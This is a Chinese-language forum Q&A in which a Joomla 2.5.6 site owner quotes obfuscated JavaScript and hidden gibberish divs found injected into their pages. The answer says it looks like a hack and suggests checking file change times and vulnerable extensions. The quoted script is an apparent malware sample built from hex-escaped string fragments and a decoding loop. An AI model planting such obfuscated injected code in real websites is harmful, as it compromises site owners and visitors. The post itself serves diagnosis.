我对 joomla 2.5.6 网站有疑问。偶尔我会注意到页面 HTML 源代码中有一些奇怪的加密代码。类似这样的代码:
<div id="bwjolqpgqnqho" class="vhdpqfdouxwsm">b kb q bxdb bjdfar, cccw da dkbd arbhcsb mbzcl bmct bpdjas e lbuasa mawdoexcuaf cdc. l axagbqdjc ze scwdk dkcrcq eudcdee qere p cre ia ydgdv dmcpdd cu dgbyaj abbnbmbm - abbz b cagcia 'faya' rawd g edcscm ac a - datbwaue pc caa. bjciccb, s. bk beccd rdye. ve kdg dzcoae. bnac dadjcudgbz - b easchcf b mb cesaqdac, d alahbdd paacfbz ccar aycdbd budoac et cpcudkax bb cba t, a pcdbl cdc nbk dpakcea dawdk d adgemcfbyb abbbccia, c dtccbablcj; bnbjciagdndcdw eq eqdbcddfarch. d jd, ocpdfarbuaw a lb g b u bwd edxa z abb ybe awd, iahbbadbybhabclbxagbpdhc zesdda xaxa qabchadambmdxcabdb ucs aaet czdbal, ah an; cgad doeu bj cfabbk d la gcbb 35 cb aavavawb kbcaz bib kbwagb zdn akcjdcasb aaabbc gataw. cdeicdaacdaicuecdoc waial dbbhapagbmbj e r doepaca vb rddbbbdbaatcka sd kdtetelbf clajayehcr aaam akaybzdkdqc cb icbdbbkdqa ebgazda dmbbaoce afajbx btc ba. gbqdga hbhaqddcsdbbdbwaua dclbudvb ccbd ddkejacaham a. ddaerc vaucdb ncc bbbvc taj clad asb! b. aqbbchalanc cbubm bcebcoambyaebcba, b faqbxcuabcj. bme. ean, bodfaxcdaz doaobaar bhasanbibib. g cnc ddmaveebe, d adbdpd ebwd nafdyevbmdle wc taub rdrcta wa kczbvdhdeec - evesdme la b dedx dpctdmdfadcla cawcgeodtd pekacctela cawaraub cbidncmdsewe lc zerao cw, c gamabazbe areadm, cz ccbic bdddsbbdq</div>
<div id="ixoxvsjxrhw" class="vhdpqfdouxwsm">RKCoG2eSjsxstVfb</div>
<script>
var dstyivgcdrqqdx=(1929296112>2050752883?"\x6b\x77":"\x72\x76");
var nmhccirwiihn=(104472961<11000854?"\x65\x74":"re");
var lisknlunhmqet=(1186652785<445269550?"\x77\x64":"r");
nmhccirwiihn+=(531284007+653848334>327931464?"\x74\x75\x72\x6e":"h");
var zrjtzvapxzu=(14463650+610071539>61219278?"\x72\x65\x74\x75":"h");
var aszmusumizwozpig=(426160674+1361381336<387797917+1566709949?"\x72\x65":"jxt");
var izpemkvqmmobs=(950083231>1227876977?"\x70\x66":"i");
dstyivgcdrqqdx+=(493011132<452720027?"\x79\x7a":"\x3a\x31\x31");
nmhccirwiihn+=(794042046+1118740131>1233259606?"\x20":"d");
var bsgwqjlfbyrqlp=(2035779590<1136018259?"aq":"ret");
var sfqcsmbjevzhln=(312554261+65106612<187058867+677910351?"\x72":"\x72\x7a\x77");
var utwwjrxktzrx=(114217555+1954790718>894395565?"[]":"\x6f\x6b");
var iolbbxrrjeidgrp=(303028237+550171059<514432896+821377708?"\x72":"\x74");
iolbbxrrjeidgrp+=(499985427>889587822?"nok":"\x65\x74\x75\x72\x6e");
var kqmuuyelqyxqfz=(1527911828+613124032<663145577+1481136903?"f":"p");
utwwjrxktzrx+=(1536082584>1934435039?"xh":"\x5b\x75\x79");
var tzrjfsqughnav=(796279552+607718112>17600193?"\x72":"mj");
kqmuuyelqyxqfz+=(1697844671+167811137<1412837828+546852759?"\x75":"\x76\x65");
utwwjrxktzrx+=(60945469>1170273576?"w":"\x75\x6f");
zrjtzvapxzu+=(1251932751+160236872<947197532+500098101?"rn":"us");
kqmuuyelqyxqfz+=(1710202476+289532444<928257733+1147619777?"n":"\x7a\x77");
var idxxspyqjdhtws=(1205489743+143021423<964968493+774463552?"ret":"\x6f\x65\x66");
var ixoxvsjxrhw=(503914128+831334202>754056605?"\x69\x78\x6f":"gi");
tzrjfsqughnav+=(175195049+91195650>199815031?"\x65\x74":"rk");
idxxspyqjdhtws+=(998203113>1543504395?"\x73\x71":"u");
aszmusumizwozpig+=(1183542335+117680842<615936676+1097840178?"\x74\x75\x72\x6e":"\x70\x72");
iolbbxrrjeidgrp+=(1417804280<956308750?"ser":" ");
nmhccirwiihn+=(1275596373+304125062<938435994+1190623659?"i":"s");
var rcnaswwbdim=(1604120453<1554370323?"\x66\x73":"\x72\x65\x74");
var lvjbjpqohpl=(109054309+35702381<263995810+676605071?"\x72":"f");
utwwjrxktzrx+=(995689741>2028647691?"st":"w");
var muflxttvhbex=[dstyivgcdrqqdx, aplkenurwllomp,];
for (zjbwmhyuoepma=thrxwuwdiaqq; edrpvfucpe(zjbwmhyuoepma,ctjtpxekjsbrnt(muflxttvhbex)); zjbwmhyuoepma++)
{
if (edrpvfucpe((+[window.sidebar]),bjscvqbtkrcf(utcexmovlgf(zjbwmhyuoepma),muflxttvhbex[zjbwmhyuoepma])))
{
wenqrusckvqv=tmwjgjdehfebi(ctjtpxekjsbrnt(muflxttvhbex), zjbwmhyuoepma);
break;
}
}</script>
<div class="vhdpqfdouxwsm">by cvekdycuc ceicqendacwcvczdzdwdlcdes dkdvcxeld xcfc; yepea. eg csd k cbd veccw, d wcyeocqebdd cyeb cvb zcobzd kdfcadgdud. ye hep dyc tedcve jdte sdx crejcz. e acudjdldxdbd bcecpepb xby, czcsdycdcact cpc edvdfdacod vcr e. b d a by coeoeac ocpe kcacrehcoc sefepe qb yc pes</div>
<script>
for (zjbwmhyuoepma=thrxwuwdiaqq; edrpvfucpe(zjbwmhyuoepma, ctjtpxekjsbrnt(bicxcttzqmg)); zjbwmhyuoepma=wybnybknfgac(zjbwmhyuoepma, xbvdbcshcctsgdxd))
{
var ysmxkecizsyq=yvmzahgdgrtno(bicxcttzqmg, zjbwmhyuoepma);
if (wettklooonrumf(dtjvvrebndhszo(46*wenqrusckvqv + 5, ysmxkecizsyq), dtjvvrebndhszo(ysmxkecizsyq, 52*wenqrusckvqv + 18)))
{
if (vynawhmpavrzx(ifajvnijackoa, wenqrusckvqv))
{
lcxnvxkmfihz=wybnybknfgac(lcxnvxkmfihz, myrttyhlwgbhon(vynawhmpavrzx((mvdcltcvebpo(wybnybknfgac(nlzjcpleylbraq, tmwjgjdehfebi(ysmxkecizsyq, 46*wenqrusckvqv + 5)), yvmzahgdgrtno(wfnqmuukgcio, vynawhmpavrzx(lrrmwfxzyrc, ctjtpxekjsbrnt(wfnqmuukgcio))))), 94*wenqrusckvqv + 67)));
lrrmwfxzyrc=wybnybknfgac(lrrmwfxzyrc, xbvdbcshcctsgdxd);
}
else
{
nlzjcpleylbraq=ziesauzqqjdi(12*wenqrusckvqv + 2, tmwjgjdehfebi(ysmxkecizsyq, 46*wenqrusckvqv + 5));
}
ifajvnijackoa=wybnybknfgac(ifajvnijackoa, xbvdbcshcctsgdxd);
}
}
我不知道这是由某个模块生成的合法代码还是黑客攻击的结果。
答案1
我觉得这不合法。如果您在服务器上有 root 访问权限,请stat
在 file.html 上运行命令stat file.html
并查找更改时间。这将有助于您调查服务器是如何被黑客入侵的。由于您提到的 Joomla 版本相当老旧,我怀疑他们要么利用 Joomla 核心中的漏洞入侵,要么您有一个易受攻击的扩展。您可以在以下位置获取有关易受攻击的扩展的更多信息https://vel.joomla.org/